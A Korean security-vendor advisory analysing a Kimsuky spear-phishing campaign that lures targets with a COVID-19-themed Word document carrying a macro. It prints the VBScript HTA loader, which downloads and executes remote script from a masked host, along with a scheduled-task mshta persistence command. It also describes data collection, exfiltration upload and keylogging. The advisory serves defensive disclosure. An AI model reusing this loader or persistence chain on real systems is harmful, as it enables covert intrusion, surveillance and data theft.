김수키(Kimsuky), 코로나19 바이러스 내용의 스모크 스크린 APT 주의
최근 코로나19 바이러스 관련 국내 확진자 수가 1,000명을 돌파하면서 코로나19에 대한 공포감이 확산되는 분위기를 악용하여 악성코드가 포함된 이메일이 유포되고 있어 사용자들의 주의가 필요합니다.
이스트시큐리티 ESRC에서 이미 여러차례 코로나 19 이슈를 악용한 악성코드에 대해 주의를 당부드렸지만, 모두 외국어로 된 이메일들 이었습니다.
그러나, 2월 26일(수)에 한글로 작성된 코로나 19 바이러스 사칭 악성코드가 발견되어 국내 사용자들의 각별한 주의가 필요합니다.
이번 공격은 꾸준히 국내 기업/기관을 대상으로 스피어피싱과 APT 공격을 지속해 오고있는 김수키(Kimsuky) 조직의 소행으로 추정되고 있으며, 기존의 김수키(Kimsuky) 조직 공격의 일환인 '스모크 스크린' 캠페인의 하나로 분석되었습니다.
※ 스모크 스크린 캠페인 관련글
▶ ‘통일외교안보특보 발표문건’ 사칭 스피어피싱 공격 등장… 김수키(Kimsuky) 조직 소행 추정 (20.01.14)
▶ 북한 파일명으로 보고된 Kimsuky 조직의 '스모크 스크린' PART 3 (19.09.27)
▶ 암호화된 APT 공격, Kimsuky 조직의 '스모크 스크린' PART 2 (19.05.13)
▶ 한ㆍ미 겨냥 APT 캠페인 '스모크 스크린' Kimsuky 실체 공개 (19.04.17)
이번에 발견된 악성 메일은 유창한 한글 내용으로 작성되었으며, 코로나19 바이러스 관련 내용을 담고 있습니다.
[그림 1] 코로나바이러스 관련 이사장님 지시사항으로 사칭한 악성 이메일
이번 스피어피싱 공격은 국제 교류/외교 관련 기관을 타깃으로 진행되었습니다. 스피어피싱 메일은 유창한 한글을 구사하고 있으며 ‘코로나바이러스 대응.doc’’이라는 악성 매크로가 포함된 DOC 워드 문서를 첨부하고 있습니다.
만약 이메일 수신자가 해당 악성 문서 파일을 열람하면, 문서 내 악성 매크로 스크립트가 동작하고 공격자가 사전에 설정한 국내 모 호스팅 서비스를 악용하여 추가로 악성코드를 내려받습니다.
악성코드 분석
[그림 2] ‘코로나바이러스 대응.doc’ 문서 실행 화면
이메일 수신자가 첨부파일을 실행하면, 악성 매크로 스크립트 실행을 위해 '컨텐츠 활성화'를 누르도록 유도합니다. 만약 사용자가 '컨텐츠 활성화'를 클릭할 경우 다음과 같은 내용이 보여지게됩니다.
[그림 3] ‘코로나바이러스감염증-19’ 관련 문서 원문
'코로나바이러스감염증-19 대책 회의' 라는 문서와 함께 국내 코로나19 확진자 현황이 적힌 내용이 보여지지만, 해당 문서에는 악성 매크로가 포함되어 있어 사용자 몰래 백그라운드에서 악성 행위를 하게됩니다.
[그림 4] 악성 매크로가 포함된 워드 파일
또한 동시에 문서에 포함된 악성 매크로가 실행되면서 추가 스크립트를 실행하기 위해 mshta로 특정 서버에 접속하여 search.hta 라는 이름의 파일을 시작으로 아래의 순서대로 추가 코드를 내려받아 실행합니다.
● search.hta
악성 매크로부터 실행된 ‘search.hta’는 ‘eweerew.php?er=1’에 있는 스크립트를 가져와 실행합니다.
<html>
<script language="VBScript">
On Error Resume Next:
Set Post0 = CreateObject("MSXML2.ServerXMLHTTP.6.0"):
Post0.open "GET", "http://****.*****.com/***/***/skin/member/basic/upload/eweerew.php?er=1", False:
Post0.Send:
t0=Post0.responseText:
Execute(t0)
</script>
</html>
Set WShell=CreateObject("WScript.Shell"):retu=WShell.run("powershell.exe taskkill /im mshta.exe /f" , 0 ,true)
그 후, 공격자가 원하는 시점에 공격 코드를 동일 url(‘eweerew.php?er=1’)로부터 내려받아 실행합니다.
● ‘eweerew.php?er=1 - 감염PC 정보 수집 및 추가 명령 제어
‘eweerew.php?er=1'에서 내려받는 스크립트는 다음과 같은 기능을 수행합니다.
1. MS office 각 버전의 매크로 세팅을 수정하여 매크로 공격에 취약하게 한다.
2. 아래의 감염자 정보를 수집하고 ‘%appdata%\Windows\desktop.ini’에 저장한다.
a. 사용자의 이름
b. 호스트 네임
c. 네트워크 속성
d. 사용자 계정 정보
e. %programfiles% 아래 목록
f. %programfiles% (x86) 아래 목록
g. %programdata%\Microsoft\Windows\Start Menu 아래 목록
h. %programdata%\Microsoft\Windows\Start Menu\Programs 아래 목록
i. %appdata%\Microsoft\Windows\Recent 아래 목록
j. 현재 실행중인 프로세스 목록
k. 윈도우 버전
l. 윈도우 환경 변수 목록
m. HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default 아래 목록
n. arp 목록
o. %appdata%\Microsoft 아래 목록
p. %systemroot%\SysWOW64\WindowsPowerShell\ 아래 목록
q. 드라이브(c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: x: y: z:) 의 볼륨 정보
r. %userprofile%\Downloads 아래 목록
s. %userprofile%\Documents 아래 목록
t. 엑셀과 워드의 14.0~16.0 의 Security 버전
u. 아웃룩 Autodiscover URL
v. 아웃룩 프로필 목록
3. 공격자의 명령을 받기 위해 ‘작업 스케줄러’에 ‘Update’ 이름으로 자동 실행 등록 및 3분 간격으로 실행
- 작업명 : Update
- 동작 : ‘mshta http://****.*****.com/***/***/skin/member/basic/upload/cfhkjkk.hta’
● ‘eweerew.php?er=2’ - 다운로더 기능
‘cfhkjkk.hta’로 부터 연결되는 아래의 URL로부터 ‘res1.txt’, ‘res2.txt’ 데이터를 받아 실행합니다.
http://****.*****.com/***/***/skin/member/basic/upload/download.php?param=
다운로드 코드는 아래와 같습니다.
[그림 5] ‘res1.txt’, ‘res2.txt’ 다운로드 코드
● res1.txt - 업로더 기능
%appdata%\Windows\res.ini’을 ‘http://****.*****.com/***/***/skin/member/basic/upload/wiujkjkjk.php’에 업로드 합니다.
[그림 6] ‘res.ini’ 파일 업로드 코드
● res2.txt - 키로깅 기능
감염 PC로부터 키보드 입력 값을 받아 ‘appdata\Windows\desktop.ini’ 파일에 저장합니다.
[그림 7] 키로깅 코드
스모크스크린 캠페인과의 유사도 비교
문정인 대통령 통일외교안보특보 미국 국익센터 세미나.doc | 코로나바이러스 대응.doc |
|
|
문서 매크로 코드 비교 | |
|
|
정보 수집 및 자동 실행 등록 코드 비교 |
[표1] 스모크스크린 캠페인과 유사도 비교표
최근 코로나19 바이러스 피해를 사전에 예방하는 차원에서 재택근무를 많이 채택하는 국내/기업 기관의 임직원들이 평소보다 이메일 열람을 자주 할 가능성이 높습니다. 또한 재택근무 시 VPN을 통해 기업 내부망에 접속을 하고 있기 때문에 더더욱 외부 이메일이나 첨부파일 열람시 주의가 필요합니다.
알약에서는 해당 악성코드에 대해 Trojan.Downloader.DOC.Gen으로 탐지하고 있습니다.
유사 위협에 사용된 도구와 침해지표(IoC) 등을 '쓰렛 인사이드(Threat Inside)' 위협 인텔리전스 리포트에서 확인하실 수 있습니다.